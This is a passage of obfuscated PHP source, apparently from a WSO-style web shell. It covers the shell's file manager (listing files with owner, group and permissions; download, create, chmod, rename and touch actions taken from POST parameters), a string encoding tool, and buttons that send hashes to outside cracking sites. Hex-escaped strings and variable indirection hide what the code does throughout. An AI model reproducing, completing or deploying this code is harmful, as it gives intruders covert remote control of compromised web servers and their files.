x68\\x63\"]=\"\\x69\";${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"yb\\x76\\x6an\\x71\\x6a\"]=\"\\x64\\x69\\x72C\\x6f\\x6e\\x74\\x65n\\x74\";${\"\\x47LO\\x42\\x41\\x4cS\"}[\"\\x77\\x77\\x70\\x68vt\\x73\\x69\\x78\\x65\"]=\"\\x69\";$jlzemlbq=\"i\";${\"GL\\x4f\\x42A\\x4c\\x53\"}[\"\\x79\\x67\\x79\\x72\\x71si\\x6f\\x68\\x6eb\"]=\"d\\x69r\\x43\\x6f\\x6e\\x74en\\x74\";$xswwcoa=\"\\x6f\\x77\";${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x6ep\\x65c\\x76wo\\x65m\\x62\"]}=@posix_getpwuid(@fileowner(${${\"\\x47\\x4c\\x4f\\x42ALS\"}[\"\\x79\\x67\\x79\\x72\\x71\\x73\\x69\\x6f\\x68n\\x62\"]}[${${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x79\\x67\\x6a\\x78s\\x6c\\x71\"]}]));${\"\\x47\\x4cO\\x42AL\\x53\"}[\"\\x70\\x7a\\x6c\\x73u\\x6b\\x79\\x66\"]=\"i\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"y\\x6e\\x70hts\\x73u\"]=\"\\x69\";${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x62\\x6e\\x68i\\x72\\x6fj\\x68g\\x78\\x67\\x77\"]}=@posix_getgrgid(@filegroup(${${\"G\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x6c\\x62ski\\x69\"]}[${$oolvws}]));$dxuhdgle=\"\\x69\";${\"GLOBA\\x4c\\x53\"}[\"\\x71x\\x74\\x6cw\\x6fowxr\\x74\"]=\"\\x66\\x69l\\x65\\x73\";${${\"\\x47LO\\x42\\x41L\\x53\"}[\"\\x78m\\x7a\\x71fo\"]}=array(\"n\\x61me\"=>${$gkiykg}[${$hxhtkxcopfku}],\"p\\x61th\"=>$GLOBALS[\"cw\\x64\"].${${\"\\x47\\x4cOB\\x41\\x4cS\"}[\"l\\x62s\\x6b\\x69i\"]}[${$dxuhdgle}],\"\\x6d\\x6f\\x64i\\x66y\"=>date(\"Y-\\x6d-\\x64 H:i:\\x73\",@filemtime($GLOBALS[\"c\\x77\\x64\"].${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x66\\x6b\\x76\\x71\\x6bbm\"]}[${${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"\\x79\\x6e\\x70\\x68\\x74s\\x73\\x75\"]}])),\"\\x70\\x65rms\"=>viewPermsColor($GLOBALS[\"c\\x77\\x64\"].${${\"GL\\x4fB\\x41\\x4c\\x53\"}[\"l\\x62\\x73\\x6b\\x69\\x69\"]}[${$iesoyaib}]),\"\\x73\\x69\\x7ae\"=>@filesize($GLOBALS[\"cwd\"].${$oqwfempygnqr}[${${\"G\\x4cO\\x42\\x41\\x4cS\"}[\"ubjgm\\x69y\\x76s\\x63b\"]}]),\"\\x6fwn\\x65r\"=>${$xswwcoa}[\"n\\x61m\\x65\"]?${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6e\\x70\\x65\\x63\\x76\\x77\\x6fe\\x6db\"]}[\"nam\\x65\"]:@fileowner(${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"l\\x62\\x73\\x6b\\x69i\"]}[${${\"\\x47\\x4cO\\x42\\x41L\\x53\"}[\"k\\x68\\x63z\\x64\\x73\\x78\\x66j\\x68\\x63\"]}]),\"\\x67r\\x6fu\\x70\"=>${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x62j\\x65et\\x6f\\x72\\x67\\x75\\x67\\x6d\\x6d\"]}[\"n\\x61\\x6d\\x65\"]?${${\"G\\x4cO\\x42A\\x4cS\"}[\"\\x62jee\\x74o\\x72\\x67ugm\\x6d\"]}[\"\\x6ea\\x6de\"]:@filegroup(${${\"\\x47LOBA\\x4c\\x53\"}[\"\\x77\\x69e\\x74\\x63\\x72\\x6f\"]}[${${\"G\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x77\\x77\\x70\\x68\\x76\\x74s\\x69x\\x65\"]}]));if(@is_file($GLOBALS[\"\\x63\\x77\\x64\"].${${\"G\\x4c\\x4f\\x42ALS\"}[\"le\\x66\\x66\\x71\\x7ax\\x76v\"]}[${${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x75\\x62\\x6a\\x67mi\\x79\\x76\\x73\\x63\\x62\"]}]))${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x71\\x78\\x74\\x6c\\x77\\x6f\\x6f\\x77\\x78\\x72\\x74\"]}[]=array_merge(${${\"\\x47LOB\\x41\\x4c\\x53\"}[\"\\x62\\x6e\\x66\\x69\\x74\\x6a\"]},array(\"t\\x79pe\"=>\"f\\x69le\"));elseif(@is_link($GLOBALS[\"\\x63wd\"].${${\"G\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"lb\\x73k\\x69i\"]}[${$jlzemlbq}]))${${\"\\x47\\x4cO\\x42\\x41LS\"}[\"e\\x73k\\x76\\x75\\x6a\\x78\\x78\"]}[]=array_merge(${$nhkfjokyipxw},array(\"t\\x79\\x70\\x65\"=>\"l\\x69\\x6ek\"));elseif(@is_dir($GLOBALS[\"c\\x77\\x64\"].${${\"\\x47L\\x4fB\\x41L\\x53\"}[\"\\x79\\x62\\x76\\x6a\\x6e\\x71j\"]}[${${\"\\x47LOB\\x41L\\x53\"}[\"\\x70\\x7a\\x6csu\\x6b\\x79f\"]}])&&(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"l\\x62sk\\x69\\x69\"]}[${${\"\\x47L\\x4fB\\x41L\\x53\"}[\"\\x75b\\x6ag\\x6d\\x69\\x79\\x76\\x73\\x63\\x62\"]}]!=\".\"))${${\"\\x47L\\x4fB\\x41LS\"}[\"v\\x69\\x78z\\x67\\x67\\x6f\\x6e\\x65\\x70\"]}[]=array_merge(${${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"bnf\\x69\\x74\\x6a\"]},array(\"\\x74\\x79p\\x65\"=>\"\\x64\\x69r\"));}$GLOBALS[\"sor\\x74\"]=${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x63\\x6f\\x71\\x6f\\x6e\\x75\"]};function cmp($a,$b){$xmghox=\"b\";${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"pvivs\\x67\\x72\\x6c\\x63\"]=\"a\";if($GLOBALS[\"sor\\x74\"][0]!=\"\\x73\\x69\\x7a\\x65\")return strcmp(${${\"\\x47\\x4c\\x4fB\\x41LS\"}[\"w\\x6c\\x72\\x79\\x78\\x61\\x72f\\x6d\"]}[$GLOBALS[\"s\\x6f\\x72\\x74\"][0]],${${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x71k\\x64\\x76\\x75y\\x77x\\x74\\x7a\"]}[$GLOBALS[\"\\x73\\x6f\\x72t\"][0]])*($GLOBALS[\"so\\x72t\"][1]?1:-1);else return((${${\"\\x47\\x4cO\\x42A\\x4cS\"}[\"pvi\\x76\\x73\\x67\\x72lc\"]}[\"si\\x7ae\"]<${$xmghox}[\"s\\x69\\x7a\\x65\"])?-1:1)*($GLOBALS[\"s\\x6frt\"][1]?1:-1);}usort(${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x75\\x6d\\x77\\x67\\x76\\x64ge\"]},\"cm\\x70\");usort(${${\"\\x47\\x4c\\x4fB\\x41LS\"}[\"v\\x69\\x78zgg\\x6f\\x6e\\x65p\"]},\"\\x63\\x6dp\");$xunylnt=\"l\\x69\\x6e\\x6bs\";usort(${${\"\\x47L\\x4fBAL\\x53\"}[\"\\x61\\x6d\\x67\\x6e\\x6cs\\x72\\x62\\x63\\x64\"]},\"\\x63\\x6dp\");${${\"GLOB\\x41LS\"}[\"h\\x64o\\x72\\x6a\\x70\\x75\"]}=array_merge(${${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"a\\x63f\\x71\\x71\\x66ys\\x62fz\\x70\"]},${$xunylnt},${${\"\\x47LO\\x42A\\x4cS\"}[\"umw\\x67\\x76\\x64ge\"]});${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"\\x6f\\x7a\\x6c\\x77o\\x66\\x66\"]}=0;foreach(${${\"G\\x4cOB\\x41LS\"}[\"\\x75mw\\x67v\\x64\\x67\\x65\"]} as${${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"s\\x6c\\x70\\x65\\x6c\\x63\"]}){$rvrgjfhpjdk=\"f\";$izzwfzokizj=\"\\x66\";$mwgzdwxpkn=\"\\x66\";${\"G\\x4c\\x4fB\\x41\\x4cS\"}[\"tb\\x6a\\x78dd\\x6f\\x77t\"]=\"\\x66\";$afxohmbei=\"\\x66\";${\"\\x47\\x4c\\x4fBAL\\x53\"}[\"\\x64sq\\x76\\x62\\x64e\\x6a\\x73u\"]=\"\\x66\";$ezrujob=\"\\x66\";$cmmbnxgheit=\"\\x6c\";$jdikjgstic=\"\\x66\";$rwfqnwioaf=\"\\x66\";$nvbeellcwieh=\"f\";echo\"\\x3c\\x74\\x72\".(${$cmmbnxgheit}?\"\\x20\\x63\\x6ca\\x73\\x73=\\x6c1\":\"\").\"><\\x69\\x6e\\x70\\x75t t\\x79\\x70\\x65=\\x63\\x68e\\x63k\\x62\\x6fx\\x20\\x6e\\x61\\x6d\\x65\\x3d\\\"f[]\\\" \\x76\\x61\\x6cue\\x3d\\x22\".urlencode(${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x73l\\x70e\\x6cc\"]}[\"nam\\x65\"]).\"\\\"\\x20\\x63\\x6c\\x61s\\x73\\x3d\\x63\\x68\\x6b\\x62\\x78>\\x3c\\x62\\x3e[\\x20\".htmlspecialchars(${${\"\\x47\\x4cOB\\x41L\\x53\"}[\"t\\x62j\\x78\\x64\\x64o\\x77\\x74\"]}[\"nam\\x65\"]).\"\\x20]\\x3c/td\\x3e\\x3ct\\x64>\".((${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x73\\x6cp\\x65l\\x63\"]}[\"t\\x79pe\"]==\"f\\x69\\x6c\\x65\")?viewSize(${$rvrgjfhpjdk}[\"\\x73\\x69\\x7ae\"]):${$afxohmbei}[\"t\\x79p\\x65\"]).\"\\x3c/\\x74\\x64>\".${${\"GL\\x4f\\x42\\x41\\x4cS\"}[\"\\x73\\x6c\\x70\\x65\\x6c\\x63\"]}[\"modi\\x66\\x79\"].\"\\x3c/\\x74d><\\x74\\x64>\".${${\"\\x47LOB\\x41\\x4c\\x53\"}[\"\\x73\\x6c\\x70el\\x63\"]}[\"\\x6fw\\x6ee\\x72\"].\"/\".${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"sl\\x70\\x65l\\x63\"]}[\"\\x67ro\\x75\\x70\"].\"\\x3c/td\\x3e\\x3c\\x74d><\\x61\\x20\\x68r\\x65\\x66\\x3d\\x23 o\\x6e\\x63l\\x69ck=\\\"g('\\x46\\x69l\\x65s\\x54ool\\x73',n\\x75l\\x6c,\\x27\".urlencode(${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"d\\x73\\x71\\x76b\\x64\\x65\\x6a\\x73\\x75\"]}[\"\\x6e\\x61me\"]).\"\\x27,\\x27\\x63\\x68\\x6d\\x6fd')\\\">\".${$jdikjgstic}[\"per\\x6d\\x73\"].\"\\x3c/t\\x64><\\x74\\x64>\\x52\\x3c/a\\x3e\\x20\\x3c\\x61\\x20hr\\x65f=\\\"\\x23\\x22 \\x6f\\x6ec\\x6ci\\x63k=\\x22\\x67(\\x27\\x46\\x69\\x6ces\\x54ools',\\x6e\\x75\\x6c\\x6c,'\".urlencode(${${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"sl\\x70\\x65\\x6cc\"]}[\"n\\x61\\x6de\"]).\"\\x27,\\x20'\\x74\\x6f\\x75\\x63h')\\x22>\\x54\":\"\").\"\\x3c/t\\x64>\\x3c/tr>\";${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6f\\x7al\\x77\\x6f\\x66\\x66\"]}=${${\"G\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"o\\x7alw\\x6f\\x66\\x66\"]}?0:1;}echo \"\\t\\n\\t<\\x69\\x6ep\\x75t ty\\x70e\\x3d\\x68\\x69\\x64de\\x6e \\x6e\\x61m\\x65=\\x63\\x20\\x76\\x61\\x6cue=\\x27\\n\";echo htmlspecialchars($GLOBALS[\"cw\\x64\"]);echo \"'>\\n\\t\\x3ci\\x6eput t\\x79pe=h\\x69d\\x64e\\x6e\\x20name=\\x63harset \\x76al\\x75\\x65='\\n\";echo isset($_POST[\"c\\x68\\x61\\x72\\x73\\x65t\"])?$_POST[\"\\x63h\\x61r\\x73et\"]:\"\";echo \"\\x27\\x3e\\n\\t<\\x73el\\x65\\x63\\x74\\x20\\x6ea\\x6de=\\x27p1'\\x3e\\x3c\\x6fpti\\x6fn va\\x6c\\x75\\x65\\x3d'cop\\x79\\x27\\x3e\\x43\\x6f\\x70y\\x3c\\x6fption\\x20v\\x61\\x6cu\\x65=\\x27m\\x6fv\\x65\\x27\\x3e\\x4do\\x76\\x65\\n\";}echo \"\\x22\\x3e\\x3c/td>\\n\\t\\x3c/f\\x6f\\x72\\x6d\\x3e\\n\\t\\n\";printFooter();}function actionStringTools(){${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"f\\x63\\x64o\\x71\\x71\\x64\\x67\\x70fd\"]=\"st\\x72i\\x6egT\\x6f\\x6fls\";if(!function_exists(\"\\x68\\x65x\\x32\\x62\\x69n\")){function hex2bin($p){$uskpyv=\"\\x70\";return decbin(hexdec(${$uskpyv}));}}if(!function_exists(\"\\x68e\\x782a\\x73ci\\x69\")){function hex2ascii($p){$hmfnaw=\"\\x69\";${\"G\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x69\\x79\\x65\\x79\\x72\\x6anj\\x67q\\x64\"]=\"\\x69\";$tsdmjxh=\"\\x70\";${${\"G\\x4cOB\\x41\\x4cS\"}[\"\\x72a\\x65\\x61\\x71c\"]}=\"\";for(${$hmfnaw}=0;${${\"GLO\\x42\\x41L\\x53\"}[\"\\x75\\x62\\x6a\\x67m\\x69y\\x76s\\x63b\"]}<\\x64\\x69v\\x20\\x63l\\x61ss=\\x63o\\x6ete\\x6et\\x3e\";${$mlndonin}=array(\"Ba\\x73\\x65\\x364 enc\\x6fde\"=>\"ba\\x73\\x65\\x364_enc\\x6fd\\x65\",\"\\x42as\\x656\\x34\\x20\\x64e\\x63od\\x65\"=>\"\\x62\\x61\\x73\\x6564\\x5f\\x64e\\x63\\x6f\\x64\\x65\",\"U\\x72\\x6c \\x65nc\\x6f\\x64e\"=>\"\\x75\\x72l\\x65\\x6e\\x63ode\",\"\\x55rl\\x20dec\\x6fde\"=>\"u\\x72l\\x64eco\\x64\\x65\",\"\\x46\\x75\\x6cl ur\\x6ce\\x6e\\x63\\x6fd\\x65\"=>\"\\x66ul\\x6c_\\x75\\x72\\x6c\\x65n\\x63ode\",\"md5 ha\\x73\\x68\"=>\"\\x6dd5\",\"\\x73h\\x611\\x20hash\"=>\"\\x73ha1\",\"c\\x72\\x79\\x70\\x74\"=>\"\\x63\\x72\\x79\\x70t\",\"\\x43RC32\"=>\"c\\x72c32\",\"\\x41\\x53C\\x49I t\\x6f \\x48\\x45\\x58\"=>\"\\x61\\x73cii\\x32h\\x65x\",\"H\\x45\\x58\\x20\\x74\\x6f\\x20A\\x53C\\x49\\x49\"=>\"\\x68\\x65\\x782\\x61\\x73ci\\x69\",\"HE\\x58\\x20to\\x20D\\x45\\x43\"=>\"hexd\\x65c\",\"H\\x45\\x58 to \\x42\\x49\\x4e\"=>\"h\\x65x\\x32bi\\x6e\",\"D\\x45\\x43 t\\x6f H\\x45\\x58\"=>\"d\\x65\\x63\\x68ex\",\"\\x44\\x45C \\x74\\x6f \\x42\\x49N\"=>\"\\x64\\x65c\\x62\\x69n\",\"\\x42\\x49\\x4e to H\\x45X\"=>\"b\\x69n2he\\x78\",\"BIN \\x74\\x6f\\x20DEC\"=>\"b\\x69\\x6e\\x64\\x65\\x63\",\"\\x53\\x74ri\\x6e\\x67\\x20\\x74o \\x6c\\x6fw\\x65\\x72\\x20\\x63\\x61s\\x65\"=>\"\\x73trt\\x6flower\",\"S\\x74ri\\x6eg to\\x20\\x75\\x70p\\x65r\\x20\\x63\\x61\\x73e\"=>\"\\x73\\x74rto\\x75pp\\x65\\x72\",\"Htm\\x6c\\x73pec\\x69\\x61\\x6c\\x63h\\x61\\x72s\"=>\"\\x68t\\x6dlsp\\x65ci\\x61l\\x63ha\\x72s\",\"S\\x74ring\\x20le\\x6e\\x67\\x74\\x68\"=>\"\\x73trl\\x65\\x6e\",);if(empty($_POST[\"a\\x6a\\x61x\"])&&!empty($_POST[\"p\\x31\"]))$_SESSION[md5($_SERVER[\"HTT\\x50\\x5f\\x48O\\x53T\"]).\"\\x61j\\x61x\"]=false;echo\"\\x3cfo\\x72\\x6d \\x6e\\x61m\\x65\\x3d\\x27\\x74o\\x6f\\x6cs\\x46\\x6f\\x72m' \\x6f\\x6eSub\\x6d\\x69\\x74\\x3d\\x27if(\\x74\\x68\\x69s.aja\\x78.\\x63he\\x63\\x6b\\x65d){a(\\x6e\\x75\\x6c\\x6c,null,\\x74h\\x69s\\x2ese\\x6cec\\x74\\x54oo\\x6c\\x2ev\\x61\\x6cue,th\\x69s\\x2ein\\x70u\\x74\\x2e\\x76a\\x6c\\x75e)\\x3b\\n}e\\x6cse{g(nul\\x6c,n\\x75\\x6c\\x6c,th\\x69\\x73\\x2esel\\x65ct\\x54o\\x6fl.\\x76\\x61l\\x75e,th\\x69s\\x2einp\\x75t.\\x76alu\\x65);\\n}\\x20\\x72\\x65\\x74u\\x72\\x6e fal\\x73\\x65;\\n\\x27\\x3e\\x3cs\\x65lec\\x74\\x20nam\\x65='se\\x6c\\x65\\x63tT\\x6f\\x6fl\\x27\\x3e\";foreach(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x66\\x63d\\x6f\\x71\\x71d\\x67p\\x66d\"]} as${$qbezujgttujl}=>${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"e\\x75\\x64\\x6f\\x75e\"]})echo\"\".${${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"i\\x69\\x66\\x77\\x76\\x71c\\x6a\\x6f\\x78\"]}.\"\\x3cinpu\\x74 ty\\x70e=\\x27s\\x75\\x62\\x6di\\x74\\x27 v\\x61\\x6cu\\x65\\x3d'\\x3e>\\x27/\\x3e \\x3ci\\x6e\\x70ut t\\x79\\x70\\x65\\x3d\\x63h\\x65ckb\\x6fx \\x6eam\\x65\\x3d\\x61j\\x61\\x78 \\x76\\x61\\x6cue\\x3d1\\x20\".($_SESSION[md5($_SERVER[\"H\\x54TP_\\x48\\x4fS\\x54\"]).\"\\x61\\x6aax\"]?\"c\\x68e\\x63\\x6be\\x64\":\"\").\"\\x3e\\x20s\\x65\\x6ed\\x20using AJ\\x41X\".htmlspecialchars(@$_POST[\"\\x702\"]).\"\\x3c/t\\x65x\\x74area\\x3e\\x3c/\\x66o\\x72\\x6d>
S\\x65a\\x72c\\x68\\x20f\\x6fr ha\\x73h:\\n\\t\\t\\t<\\x69n\\x70\\x75t\\x20type\\x3d\\\"t\\x65x\\x74\\x22 \\x6ea\\x6de\\x3d\\\"\\x68\\x61s\\x68\\x22\\x20styl\\x65\\x3d\\\"\\x77\\x69dth:2\\x300\\x70x;\\n\\x22\\x3e<\\x62\\x72\\x3e\\n\\t\\t\\t<\\x62r>\\n\\t\\t\\t<\\x62r\\x3e\\n\\t\\t\\t\\x3c\\x69n\\x70\\x75\\x74\\x20t\\x79\\x70e\\x3d\\x22\\x62u\\x74\\x74\\x6f\\x6e\\\"\\x20val\\x75\\x65=\\x22too\\x6c\\x734n\\x6f\\x6fb\\x73.\\x63\\x6fm\\\"\\x20onc\\x6cic\\x6b=\\\"\\x64o\\x63u\\x6d\\x65nt.h\\x66\\x2eact\\x69on\\x3d'http://\\x77w\\x77.\\x74\\x6f\\x6f\\x6cs4n\\x6fobs.com/onl\\x69\\x6ee\\x5fp\\x68p_\\x66\\x75\\x6e\\x63t\\x69o\\x6es/'\\x3b\\n\\x64\\x6fcu\\x6den\\x74\\x2eh\\x66\\x2esubmi\\x74()\\x22\\x3e\\x3c\\x62\\x72>\\n\\t\\t\\t\\x3c\\x69np\\x75\\x74\\x20ty\\x70\\x65\\x3d\\x22bu\\x74\\x74\\x6f\\x6e\\\" v\\x61lu\\x65=\\\"\\x6dd5.red\\x6eoi\\x7ae\\x2ec\\x6fm\\x22 o\\x6e\\x63l\\x69ck=\\x22d\\x6f\\x63ume\\x6e\\x74.h\\x66.a\\x63t\\x69o\\x6e\\x3d'\\x68tt\\x70://md\\x35\\x2e\\x72e\\x64\\x6e\\x6f\\x69\\x7a\\x65.co\\x6d/?q\\x3d'+d\\x6f\\x63\\x75me\\x6et.hf.\\x68a\\x73\\x68.\\x76a\\x6cue+\\x27&s\\x3dm\\x64\\x35\\x27\\x3b\\n\\x64o\\x63um\\x65\\x6et\\x2e\\x68f\\x2esu\\x62m\\x69t()\\x22\\x3e\\x3cbr>\\n\\t\\t\\t\\x3c\\x69\\x6e\\x70\\x75\\x74 \\x74\\x79\\x70\\x65=\\x22b\\x75t\\x74\\x6f\\x6e\\\"\\x20\\x76al\\x75\\x65\\x3d\\x22m\\x645\\x64ecry\\x70te\\x72.\\x63\\x6f\\x6d\\x22 \\x6f\\x6ec\\x6c\\x69\\x63\\x6b\\x3d\\\"doc\\x75\\x6den\\x74.h\\x66.act\\x69o\\x6e='h\\x74\\x74p://\\x77w\\x77\\x2emd5d\\x65c\\x72ypt\\x65r.\\x63\\x6f\\x6d/\\x27\\x3b\\nd\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74.hf.\\x73\\x75\\x62mi\\x74()\\\"\\x3e\\x3c\\x62r\\x3e\\n\\t\\t\\n\\t\\n\";printFooter();}function actionFilesTools(){${\"\\x47\\x4cO\\x42\\x41L\\x53\"}[\"\\x6b\\x68\\x77\\x77c\\x77\\x75o\\x74\"]=\"\\x67\\x69d\";$sqyvxzfnir=\"\\x66\\x70\";if(isset($_POST[\"\\x701\"]))$_POST[\"p1\"]=urldecode($_POST[\"\\x701\"]);${\"\\x47LOB\\x41\\x4cS\"}[\"e\\x6e\\x72\\x73t\\x78\"]=\"\\x68\";${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x68w\\x62r\\x6b\\x74gp\"]=\"h\";if(@$_POST[\"\\x702\"]==\"\\x64ow\\x6elo\\x61\\x64\"){if(is_file($_POST[\"\\x701\"])&&is_readable($_POST[\"\\x70\\x31\"])){ob_start(\"ob_g\\x7ah\\x61\\x6edle\\x72\",4096);header(\"\\x43\\x6fntent-D\\x69\\x73p\\x6fsit\\x69\\x6f\\x6e: a\\x74\\x74ac\\x68\\x6de\\x6e\\x74;\\n\\x20f\\x69l\\x65\\x6ea\\x6de=\".basename($_POST[\"p1\"]));if(function_exists(\"\\x6d\\x69\\x6de_\\x63o\\x6e\\x74en\\x74_ty\\x70\\x65\")){$xcdhshzmpho=\"t\\x79\\x70e\";${${\"\\x47\\x4cOB\\x41L\\x53\"}[\"\\x75v\\x64\\x78\\x63\\x72\"]}=@mime_content_type($_POST[\"p\\x31\"]);header(\"\\x43o\\x6e\\x74ent-Ty\\x70\\x65: \".${$xcdhshzmpho});}$angknrkdcbm=\"\\x66p\";${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6a\\x65\\x6fbf\\x70\\x67\\x6e\\x6b\\x71p\\x6b\"]}=@fopen($_POST[\"\\x70\\x31\"],\"\\x72\");if(${$angknrkdcbm}){${\"\\x47LOB\\x41\\x4c\\x53\"}[\"\\x6b\\x69\\x6d\\x6e\\x68\\x72m\\x79\\x69\\x6d\\x6e\"]=\"fp\";while(!@feof(${${\"G\\x4cO\\x42AL\\x53\"}[\"\\x6a\\x65\\x6f\\x62\\x66\\x70g\\x6e\\x6b\\x71\\x70\\x6b\"]}))echo@fread(${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x6bi\\x6d\\x6e\\x68\\x72\\x6d\\x79\\x69\\x6d\\x6e\"]},1024);fclose(${${\"GL\\x4f\\x42A\\x4c\\x53\"}[\"\\x6aeob\\x66\\x70\\x67n\\x6b\\x71p\\x6b\"]});}}elseif(is_dir($_POST[\"p\\x31\"])&&is_readable($_POST[\"\\x701\"])){}exit;}if(@$_POST[\"\\x702\"]==\"m\\x6b\\x66il\\x65\"){if(!file_exists($_POST[\"p1\"])){${\"G\\x4c\\x4f\\x42\\x41LS\"}[\"f\\x72t\\x79svqcj\\x65\\x62\\x69\"]=\"\\x66\\x70\";${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x79z\\x67ftr\"]=\"f\\x70\";${${\"\\x47\\x4cO\\x42AL\\x53\"}[\"\\x66\\x72\\x74\\x79\\x73\\x76\\x71\\x63j\\x65\\x62i\"]}=@fopen($_POST[\"\\x701\"],\"w\");if(${${\"\\x47L\\x4fBA\\x4cS\"}[\"y\\x7agft\\x72\"]}){$_POST[\"p\\x32\"]=\"edi\\x74\";fclose(${${\"\\x47\\x4cO\\x42\\x41L\\x53\"}[\"je\\x6fb\\x66\\x70gn\\x6bqp\\x6b\"]});}}}$yhphmmr=\"\\x76\";$wqerdybwvn=\"\\x76\";$murdukob=\"\\x6d\";printHeader();$gmqjhxp=\"\\x66\\x70\";echo\"\\x46il\\x65 t\\x6f\\x6f\\x6cs\";${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"\\x78j\\x7a\\x73\\x6en\\x6f\"]=\"l\\x65\\x6e\";if(!file_exists(@$_POST[\"\\x701\"])){echo\"\\x46il\\x65 n\\x6f\\x74\\x20e\\x78\\x69\\x73\\x74s\";printFooter();return;}${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"w\\x6a\\x70\\x75\\x6f\\x63\\x67\\x6a\"]=\"\\x76\";${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x65\\x63\\x69\\x74\\x79rno\"]=\"\\x68\";$vuykctjpl=\"v\";$bjlnhixvm=\"\\x63\";${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"\\x65\\x70\\x64\\x6a\\x73ic\\x72\\x6d\"]}=@posix_getpwuid(@fileowner($_POST[\"\\x701\"]));${${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"l\\x6d\\x72\\x6c\\x76x\\x6a\\x61\\x78j\"]}=@posix_getgrgid(@fileowner($_POST[\"\\x70\\x31\"]));echo\"\\x3c\\x73\\x70an\\x3e\\x4e\\x61\\x6d\\x65:\\x3c/s\\x70\\x61\\x6e\\x3e \".htmlspecialchars($_POST[\"\\x701\"]).\"\\x20\\x3c\\x73\\x70\\x61n>\\x53\\x69ze:\\x3c/sp\\x61n>\\x20\".(is_file($_POST[\"\\x70\\x31\"])?viewSize(filesize($_POST[\"\\x70\\x31\"])):\"-\").\" \\x3csp\\x61n>\\x50\\x65r\\x6d\\x69ssi\\x6f\\x6e:O\\x77\\x6eer/G\\x72\\x6f\\x75\\x70:\\x3c/span\\x3e\\x20\".${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x65\\x70\\x64js\\x69cr\\x6d\"]}[\"n\\x61\\x6de\"].\"/\".${${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x6b\\x68\\x77\\x77cw\\x75\\x6f\\x74\"]}[\"n\\x61me\"].\"\\x3c\\x62\\x72>\";$rladbqkw=\"i\";echo\" \".date(\"\\x59-\\x6d-\\x64\\x20H:\\x69:\\x73\",filectime($_POST[\"p1\"])).\"\\x20\\x41\\x63\\x63e\\x73s\\x20ti\\x6d\\x65:\\x4do\\x64\\x69f\\x79\\x20\\x74\\x69m\\x65: \".date(\"\\x59-m-d H:\\x69:\\x73\",filemtime($_POST[\"\\x70\\x31\"])).\"\\x3c\\x62\\x72\\x3e\\x3c\\x62\\x72\\x3e\";if(empty($_POST[\"p\\x32\"]))$_POST[\"\\x70\\x32\"]=\"\\x76i\\x65w\";if(is_file($_POST[\"p\\x31\"]))${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x73y\\x6d\\x68c\\x75\\x70\\x6f\\x62\\x75\"]}=array(\"\\x56ie\\x77\",\"Hi\\x67h\\x6cigh\\x74\",\"D\\x6f\\x77n\\x6coad\",\"H\\x65xd\\x75\\x6dp\",\"E\\x64\\x69t\",\"C\\x68mo\\x64\",\"\\x52e\\x6eam\\x65\",\"T\\x6fuch\");else${$murdukob}=array(\"Chm\\x6fd\",\"R\\x65\\x6e\\x61\\x6de\",\"T\\x6f\\x75c\\x68\");foreach(${${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x73\\x79\\x6d\\x68\\x63\\x75p\\x6fb\\x75\"]} as${${\"G\\x4c\\x4fBA\\x4cS\"}[\"\\x77j\\x70\\x75o\\x63\\x67\\x6a\"]})echo\"\\x3ca\\x20hr\\x65f=# 